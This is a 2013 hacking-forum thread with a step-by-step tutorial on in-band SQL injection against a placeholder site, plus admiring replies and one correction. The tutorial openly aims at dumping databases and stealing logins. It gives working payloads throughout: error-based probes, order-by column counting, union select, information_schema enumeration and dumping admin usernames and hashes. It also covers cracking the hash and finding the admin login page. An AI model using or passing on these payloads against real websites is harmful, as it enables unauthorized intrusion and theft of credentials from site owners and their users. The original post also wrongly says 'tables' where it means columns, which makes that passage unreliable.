How to: Inband SQLi

General technological topics without their own forum go here

How to: Inband SQLi

Post by -Ninjex- on Sun Feb 24, 2013 6:44 am
([msg=74073]see How to: Inband SQLi[/msg])

Okay, let me get this part out of the way...
You are you, and you know what is legal and illegal. I am creating this post for information purposes only. Any actions brought forth by the information held within this post, is purely the fault of the user, and not mine.

Now to the good junk...
How to hack a webiste? How to dump a database? How to steal logins? How to deface a site?

Well, the answer to all those questions can be solved with SQLi
In this post I will not be talking about how SQL works, that is something you need to/should want to go do on your own spare time. I will however be covering some basic how to's on SQLi.
There are three classes in which SQLi can be grouped into:

    1.) Inband - Data is extracted using the same channel that is used to inject the SQL code and the data is presented directly in the application web page.

    2.) Out of Band - Data is retrieved using a different channel i.e. an e-mail

    3.) Inferential - There is no actual transfer of data. You can create true and false statements to the server, and observe the behaviour of the website/DB Server to determine if the query is true.

In this how to, I will be covering Inband SQLi. (I will cover blind/Inferential in another post in the future)
(For the remander of this tutorial I will be using "http://ninjex/page.asp?id=1" as an example of a vuln site)

Next up I want to make four things clear in which you really need to know when performing a SQLi attack. That is the differences between:

    1.) Error - You ask the Database a question, and look for useful information that it may send back.
    Code: Select all
    http://ninjex/page.asp?id=1 or 1=convert(int,(USER))--

    The database may send back something like:
    Syntax error converting the nvarchar value '[Ninjected]' to a column of data type int.

    2.) Union - Union is used to add two or more select SQL statements into one result.

    3.) Blind - Asking the DB a true/false question while watching how the page reacts to the question. You may send time questions to the server such as telling it:
    If the table name is 2 characters in length, respond in 5 seconds -- If you get an immediate response, you know it is false. You do this as many times needed to determine your table/column names, etc..

    4.)' - The single quote, also refered to as a tick, is used to test for an SQLi vuln. This is usually appended to the end of a URL.
For a website to be vulnerable via SQLi from the URL, it usually looks similar to:
http://ninjex/page.asp?id=1
http://ninjex/page.php?user=1
http://ninjex/news.php?id=853
etc

As you can see, you are really just looking for "?something=value" where something is an extension, and value is a number/string value.
To test the URL for an SQLi vuln, we need to use our tick as desribed above such as:
Code: Select all
http://ninjex/page.asp?id=1'


Now, there are a few things which could happen at this point:

1.) SQLi Error - The website will display the SQL error straight to the webpage screen you are viewing.

2.) Page Redirect - The website will redirect you to another web page.

3.) Nothing - <---- Just like it says, nothing may happen at all. If that's the case, I don't know how to inject it.


Alright, so if you get a SQLi error, it means we can go ahead and use Inband SQLi. The first thing we want to do is to figure out the amount of columns that are associated. To do this, we use a code similar to the following:
Code: Select all
http://ninjex/page.asp?id=1 order by 1--

The code above basically asks the Database if it has 1 table, if it does, the page will appear normal in front of you without any errors being produced. If that is the case, you need to keep going until you get an error, i.e:

Code: Select all
http://ninjex/page.asp?id=1 order by 1--
(No error)
Code: Select all
http://ninjex/page.asp?id=1 order by 10--
(Error -- You know know that it has at least 1, but less than 10 tables)
Code: Select all
http://ninjex/page.asp?id=1 order by 5 --
(Error -- You know know it has at least 1, but less than 5 tables)
Code: Select all
http://ninjex/page.asp?id=1 order by 4 --
(No error -- You know it has 4 tables, since 5 produced an error, and 4 did not)

So next, we need to figure out which columns are vulnerable for us to exploit, to do this we need to remember the total number of columns, as well as use our union statement in a syntax like so:
Code: Select all
http://ninjex/page.asp?id=1 union all select 1,2,3,4--

or (I tend to always turn the value after = to null. This makes it easier to read the vuln columns, and sometimes it will not produce on the screen the vuln columns with a non null value)
Code: Select all
http://ninjex/page.asp?id=null union all select 1,2,3,4--


This will output some numbers onto the web page. These numbers can be anywhere, but keep note of one of them once you find it. Let's hypothetically say that I ran:
Code: Select all
http://ninjex/page.asp?id=null union all select 1,2,3,4--

and it showed up the numbers 2 and 4 on my web page. Either one of those columns is exploitable. So next, we need to go ahead and grab the version of the DB (I will only cover how to exploit 5.0+ Databases due to it's much more simplistic nature) To do this, we need to use the command @@version on the vuln table like so:
Code: Select all
http://ninjex/page.asp?id=null union all select 1,@@version,3,4--

This should give us the version number where the number 2 was previously at on our screen. If it is 5.0+, we can continue, if it is 4.0- I suggest moving to another site, as it is much harder yet not impossible to exploit.

So next, we need to figure out the names of our tables, to do this we will use group_concat() on the vuln column, as well as a few other commands to grab information from. The syntax will look like the following:
Code: Select all
http://ninjex/page.asp?id=null union all select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()


Now let's hypothetically say that on the screen, where the number 2 used to be, now shows our list of tables with the names of: admin, user, login, email

So next we need to choose which table we want to exploit. In most cases, we would want either the admin or the login. So let's exploit the admin table, and find out what columns are inside of it.
Here, we will be using hex encoding for the table name here. We need our table name converted to hex, to do this use either software (I use hackbar addon for firefox) or use a website such as: http://encodertool.com/hexadecimal
Now, we see that admin converted to hex is "61646d696e", we just need to add a 0x to the front of that now to use it, so "0x61646d696e" Will be what we use for the table name.
Also, as a side note, we will also be using "0x3a" which is hex for a semicolon ":" this will be used to separate the dump from the columns later on.

So, now onto the good stuff of getting our column names inside of our admin table. To do that we use the following syntax:
Code: Select all
http://ninjex/page.asp?id=null union all select 1,group_concat(column_name),3,4 from information_schema.columns where table_name=0x61646d696e


Now let's hypothetically say the columns inside the admin table are: username, password, and id. We would at this point want to dump the details from inside the username and password column, so we use the following syntax to do so:
Code: Select all
http://ninjex/page.asp?id=null union all select 1,group_concat(username,0x3a,password),3,4 from admin


Let's now say that it hypothetically printed out: "Ninjex:e00cf25ad42683b3df678c61f42c6bda"
Usually the password is in MD5 format, so after finding the original value of the hash above, we see the password is "admin1"

Lastly, you can crawl the website or use an admin page finder such as http://y-shahinzadeh.ir/af/index.php to try and figure out where to login with the admin credentials.

Enjoy,
- -Ninjex-

-- Sun Feb 24, 2013 6:45 am --

Note, that if wanted I can create videos showing how this works.

:twisted:
Last edited by -Ninjex- on Sun Feb 24, 2013 1:20 pm, edited 1 time in total.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1304
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by DrRoach on Sun Feb 24, 2013 12:40 pm
([msg=74085]see Re: How to: Inband SQLi[/msg])

Thanks a lot for this can't wait to read it when I get some time
DrRoach
Poster
Poster
 
Posts: 155
Joined: Fri Feb 22, 2013 6:53 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by KthProg on Sun Feb 24, 2013 12:50 pm
([msg=74086]see Re: How to: Inband SQLi[/msg])

Wow, that is frigging awesome.
Yes, please post a video lol
User avatar
KthProg
Poster
Poster
 
Posts: 219
Joined: Wed Jan 23, 2013 7:06 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by LoGiCaL__ on Sun Feb 24, 2013 12:55 pm
([msg=74088]see Re: How to: Inband SQLi[/msg])

-Ninjex- wrote:Alright, so if you get a SQLi error, it means we can go ahead and use Inband SQLi. The first thing we want to do is to figure out the amount of tables that Database has. To do this, we use a code similar to the following:
Code: Select all
http://ninjex/page.asp?id=1 order by 1--

The code above basically asks the Database if it has 1 table, if it does, the page will appear normal in front of you without any errors being produced. If that is the case, you need to keep going until you get an error, i.e:

Code: Select all
http://ninjex/page.asp?id=1 order by 1--
(No error)
Code: Select all
http://ninjex/page.asp?id=1 order by 10--
(Error -- You know know that it has at least 1, but less than 10 tables)
Code: Select all
http://ninjex/page.asp?id=1 order by 5 --
(Error -- You know know it has at least 1, but less than 5 tables)
Code: Select all
http://ninjex/page.asp?id=1 order by 4 --
(No error -- You know it has 4 tables, since 5 produced an error, and 4 did not)
:twisted:


Nice write up. However , and please correct me if I'm wrong but, wouldn't the above code just let you know how many columns are in the table that id=1 is being used in and not the number of tables in the database? I only say this because order by 1 would order by the first column, order 2 would order by the second column and so on. So it would inject into the sql whatever code was written which uses id=1 for that php page and append order by at the end of the query. You would keep increasing the number to find out how many columns are in that table.
User avatar
LoGiCaL__
Addict
Addict
 
Posts: 1060
Joined: Sun May 30, 2010 12:33 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by -Ninjex- on Sun Feb 24, 2013 1:16 pm
([msg=74089]see Re: How to: Inband SQLi[/msg])

LoGiCaL__ wrote:Nice write up. However , and please correct me if I'm wrong but, wouldn't the above code just let you know how many columns are in the table that id=1 is being used in and not the number of tables in the database? I only say this because order by 1 would order by the first column, order 2 would order by the second column and so on. So it would inject into the sql whatever code was written which uses id=1 for that php page and append order by at the end of the query. You would keep increasing the number to find out how many columns are in that table.


Correct, I will go through and fix the table to column. :D
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1304
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by cyber-maniac on Mon Feb 25, 2013 1:07 pm
([msg=74129]see Re: How to: Inband SQLi[/msg])

Nice, thanks for that :)
Pretty thorough too
cyber-maniac
Poster
Poster
 
Posts: 113
Joined: Tue Feb 22, 2011 7:13 am
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by DrRoach on Wed Mar 20, 2013 5:56 pm
([msg=74619]see Re: How to: Inband SQLi[/msg])

Hey Ninjex great post and I really hope you decide to post a video !! I was wandering if you's post a link to a website to explain why this weakness works? I enjoy knowing how and why things work just incase something strange pops up or I want to try and explain to someone else :P Thanks once again great post.
DrRoach
Poster
Poster
 
Posts: 155
Joined: Fri Feb 22, 2013 6:53 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by limdis on Sat Mar 23, 2013 1:02 pm
([msg=74685]see Re: How to: Inband SQLi[/msg])

Moar videos
"The quieter you become, the more you are able to hear..."
"Drink all the booze, hack all the things."
User avatar
limdis
Moderator
Moderator
 
Posts: 1346
Joined: Mon Jun 28, 2010 5:45 pm
Blog: View Blog (0)


Re: How to: Inband SQLi

Post by -Ninjex- on Sat Mar 23, 2013 2:36 pm
([msg=74689]see Re: How to: Inband SQLi[/msg])

limdis wrote:Moar videos


Alright alright alright... I will make some videos soon -.-

As long as you guys promise not to freak out about my crazy cool Linux desktop that looks like cyber war-fare.
If you're not willing to learn, no one can help you. If you're determined to learn, no one can stop you.⠠⠵
The absence of evidence is not evidence of absence.
I can explain it for you, but I can't understand it for you.
User avatar
-Ninjex-
Addict
Addict
 
Posts: 1304
Joined: Sun Sep 02, 2012 8:02 pm
Blog: View Blog (0)



Return to General

Who is online

Users browsing this forum: No registered users and 0 guests